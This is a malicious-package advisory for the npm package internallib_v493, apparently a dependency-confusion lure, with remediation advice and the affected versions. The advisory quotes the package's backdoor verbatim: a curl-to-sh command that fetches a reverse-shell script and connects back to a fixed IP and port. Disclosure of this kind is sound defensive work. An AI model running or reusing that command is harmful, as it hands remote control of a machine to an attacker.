MAL-2026-4585

    Dashboard / Malicious Package / MAL-2026-4585

    MAL-2026-4585

    Published: 22 May 2026Last Modified: 20 Aug 2026Aliases: 
    GHSA-cmv7-95wv-gm8h

    Summary: Malicious code in internallib_v493 (npm)

    Details: Source: amazon-inspector (67451793d9877224d7acc26100c76cd2378f45c39354f89ca1e0dd37565741b7) The package's sole exported function `command()` in index.js executes `/bin/bash -c "curl https://reverse-shell.sh/10.0.74.90:4444|sh"`, fetching a reverse-shell script from reverse-shell.sh and piping it directly to `sh` to establish a connection back to 10.0.74.90 on port 4444. The package has no other functionality — its only advertised export is the backdoor. The package name (`internallib_v493`) and placeholder metadata (empty author, generic description) are consistent with a dependency-confusion / internal-name-squatting lure targeting organizations with private packages of similar names. A typo in the source (`reuquire` instead of `require`) means the payload throws on load in its current form, but the malicious intent is unambiguous and a corrected republish would fire immediately on any caller invoking the export. Source: ghsa-malware (4a0447b2baaf3f0997d8220e97fa8e69523cb52b7a4b1f049377044b2d1fe97d) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

    Affected packages

    Package

    Name: internallib_v493

    Purl: pkg:npm/internallib_v493

    Affected ranges

    Type: SEMVER

    Events:

    Introduced- 0
    Fixed -None

    Affected versions

    1.0.3
    1.0.4
    1.0.2
    MAL-2026-4585 | CVE-DB